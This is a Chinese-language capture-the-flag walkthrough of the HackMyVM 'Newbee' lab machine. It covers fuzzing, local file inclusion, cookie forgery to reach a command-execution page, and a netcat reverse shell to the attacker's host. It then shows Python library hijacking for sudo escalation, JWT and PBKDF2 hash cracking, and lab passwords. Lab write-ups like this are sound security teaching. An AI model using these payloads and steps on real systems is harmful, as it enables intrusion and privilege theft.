lvzhouhang
0%

Hackmyvm-Newbee

发表于 分类于 阅读次数: 38
本文字数: 14k 阅读时长 ≈ 13 分钟

信息搜集

arp-scan -l

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:f5:b9:af       PCS Systemtechnik GmbH
192.168.31.122  00:0c:29:71:20:21       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.384 seconds (107.38 hosts/sec). 3 responded

192.168.31.122就是ip地址

nmap 192.168.31.122 -p-扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.122 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 08:21 EDT
Nmap scan report for 192.168.31.122
Host is up (0.00090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:71:20:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds

80端口

查看页面源码,在最下面可以发现有一个

1
<!--Wrong paramter to GET-->

对get参数进行fuzz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

┌──(root㉿kali)-[~/Desktop/tmp]
└─# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  -u "http://192.168.31.122?FUZZ=/etc/passwd" --hh 18851
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.31.122?FUZZ=/etc/passwd/
Total requests: 220559

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001799:   200        376 L    1270 W     18863 Ch    "hack"

能fuzz出来参数名为hack,但是页面最下方还是会报错

1
<!-- include failed try another file -->

尝试包含其他文件

扫描目录可以扫描到一个secret.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.122/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-m
edium.txt -x .php,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.122/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 18852]
/contact.php          (Status: 200) [Size: 8853]
/about.php            (Status: 200) [Size: 10036]
/blog.php             (Status: 200) [Size: 9782]
/products.php         (Status: 200) [Size: 12163]
/terms.php            (Status: 200) [Size: 6670]
/assets               (Status: 301) [Size: 317] [--> http://192.168.31.122/assets/]
/testimonials.php     (Status: 200) [Size: 7907]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.31.122/javascript/]
/checkout.php         (Status: 200) [Size: 13307]
/secret.php           (Status: 200) [Size: 2187]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]

secret.php可以执行命令,但是必须要先进行身份验证,用lfi包含secret.php试试

1
http://192.168.31.122/?hack=php://filter/convert.base64-encode/resource=secret.php

可以包含出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#secret.php
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>命令行控制台</title>
    <style>
        body {
            background-color: #1e1e1e;
            font-family: Consolas, monospace;
            color: #fff;
            margin: 0;
            padding: 0;
        }

        .console {
            width: 80%;
            margin: 50px auto;
            padding: 20px;
            background-color: #000;
            border-radius: 8px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.5);
            height: 400px;
            overflow-y: auto;
            font-size: 16px;
        }

        .output {
            white-space: pre-wrap;
            margin-bottom: 10px;
        }

        .input-container {
            display: flex;
            align-items: center;
        }

        .input-container .prompt {
            color: #00ff00;
            margin-right: 5px;
        }

        .input-container input {
            background: transparent;
            border: none;
            color: #fff;
            width: 100%;
            padding: 5px;
            font-size: 16px;
            outline: none;
        }

        .input-container input:focus {
            border: 1px solid #00ff00;
        }

        .input-container input::placeholder {
            color: #888;
        }

        .console-footer {
            padding-top: 10px;
            color: #888;
            font-size: 12px;
            text-align: center;
        }
    </style>
</head>
<body>

<div class="console">
    <div class="output" id="output">
        <?php

        if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') {

            if (isset($_GET['command'])) {
                $command = $_GET['command'];
                $output = shell_exec($command);
                echo '<div>\> ' . htmlspecialchars($command) . '</div>';
                echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>';
            }
        } else {
            echo '<div>No permission to execute commands, lacking admin permission.</div>';
        }
        ?>
    </div>

    <div class="input-container">
        <span class="prompt">\></span>
        <form method="get">
            <input type="text" name="command" id="input" placeholder="command..." autocomplete="off">
        </form>
    </div>
</div>

<script>
    const inputField = document.getElementById("input");

    inputField.focus();
</script>

</body>
</html>

伪造cookie

1
Cookie: AreYouAdmin=yes

然后反弹shell

1
2
nc -e /bin/bash 192.168.31.129 4444
script -qc /bin/bash /dev/null #获得交互式shell

提权

1
2
3
4
5
6
7
8
9
www-data@Newbee:/var/www/html/shop$ sudo -l
sudo: unable to resolve host Newbee: Temporary failure in name resolution
Matching Defaults entries for www-data on Newbee:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    targetpw, use_pty

User www-data may run the following commands on Newbee:
    (debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#vuln.py
import random
import time
import math
import string
import datetime

def generate_random_string(length=10):

    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def pointless_computation():

    number = random.randint(1, 1000)
    result = math.sqrt(number) * math.log(number)
    print(f"Calculated math nonsense: sqrt({number}) * log({number}) = {result}")

def simulate_time_wasting():

    now = datetime.datetime.now()
    print(f"Started wasting time at {now}")
    time.sleep(2)  # 故意睡眠 2 秒
    later = datetime.datetime.now()
    print(f"Finished wasting time at {later}. Time wasted: {later - now}")

def pointless_string_operations():

    rand_str = generate_random_string()
    print(f"Generated random string: {rand_str}")
    reversed_str = rand_str[::-1]
    print(f"Reversed string: {reversed_str}")
    print(f"String length: {len(rand_str)}")

if __name__ == "__main__":
    pointless_computation()
    simulate_time_wasting()
    pointless_string_operations()
    print("All done. The script accomplished nothing useful.")

可以在/var/www/html目录下创建一个random.py文件进行劫持,python文件会优先加载当前目录下的库

1
2
3
#random.py
import os
os.system("bash -p")
1
2
www-data@Newbee:/var/www/html$ sudo -u debian /usr/bin/python3 /var/www/html/vuln.py
debian@Newbee:/var/www/html$

提到debian用户了,home目录下有一个note.txt和一个config.php

1
2
debian@Newbee:~$ cat note.txt
Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me
1
2
3
4
5
6
7
8
9
10
11
debian@Newbee:~$ cat config.php
<?php
$servername = "localhost";
$username = "root";
$password = "


$conn = new mysqli($servername, $username, $password);

............
............

要拿到数据库的密码

查看端口

1
2
3
4
5
6
7
8
debian@Newbee:~$ ss -lntup
Netid  State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port Process
udp    UNCONN  0       0              0.0.0.0:68          0.0.0.0:*
tcp    LISTEN  0       128            0.0.0.0:22          0.0.0.0:*
tcp    LISTEN  0       80           127.0.0.1:3306        0.0.0.0:*
tcp    LISTEN  0       128          127.0.0.1:5000        0.0.0.0:*
tcp    LISTEN  0       128               [::]:22             [::]:*
tcp    LISTEN  0       511                  *:80                *:*

可以发现本地有5000端口,用socat将5000端口转发出去

1
debian@Newbee:~$ socat TCP-LISTEN:5001,fork TCP4:127.0.0.1:5000

是一个留言板,登录处除了admin,其他的都可以随意登录,cookie里有一个jwt,可以猜测是jwt伪造

可以用hashcat爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -a 0 -m 16500 ./1 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12500H, 2917/5898 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMzEyMyIsImV4cCI6MTc0MzAyNTM4OH0.qTMF9XS0BYo7nKIDg9rFr1qmUfR4btXsLS7GZv2QVW4:noob

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 16500 (JWT (JSON Web Token))
Hash.Target......: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZS...v2QVW4
Time.Started.....: Wed Mar 26 08:44:45 2025 (3 secs)
Time.Estimated...: Wed Mar 26 08:44:48 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2052.7 kH/s (0.87ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5025792/14344385 (35.04%)
Rejected.........: 0/5025792 (0.00%)
Restore.Point....: 5021696/14344385 (35.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: noobface888 -> nona1807
Hardware.Mon.#1..: Util: 44%

Started: Wed Mar 26 08:44:44 2025
Stopped: Wed Mar 26 08:44:49 2025

noob就是密钥,用户名伪造成admin,可以看到留言板的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
debian@Newbee:~$ mysql -uroot -pTheStrongestPasswordHYHcreated
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

No entry for terminal type "unknown";
using dumb terminal settings.
No entry for terminal type "unknown";
using dumb terminal settings.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

user库的user表里有debian的密码

1
2
3
4
5
6
7
8
9
Database changed
MariaDB [user]> select * from user;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| id | username | passwd
                   | salt                             | passwd_hash_algo |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
|  1 | debian   | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60   |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
1 row in set (0.001 sec)

pbdf2爆破参考https://notes.benheater.com/books/hash-cracking/page/pbkdf2-hmac-sha256

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat 2
sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -a 0 ./2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12500H, 2917/5898 MB (1024 MB allocatable), 8MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

INFO: All hashes found as potfile and/or empty entries! Use --show to display them.

Started: Wed Mar 26 08:49:58 2025
Stopped: Wed Mar 26 08:49:59 2025
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat ./2 --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA:1qaz2wsx

用户home目录下还有一个.secret目录,里面有一个密码的压缩包

1
2
3
4
5
6
7
debian@Newbee:~$ cd .secret/
debian@Newbee:~/.secret$ ls
hint.txt  password.zip
debian@Newbee:~/.secret$ cat hint.txt
password is md5(key)

and key is in mysql!!!!!!

密码是1qaz2wsx的md5

图片是马赛克,网上有一个项目是用来恢复马赛克的

https://github.com/spipm/Depixelization_poc

其实也不用跑,图片的原图就是这个项目的示例图片

密码是hellofromtheotherside

1
2
3
debian@Newbee:/tmp$ su - root
Password:
root@Newbee:~#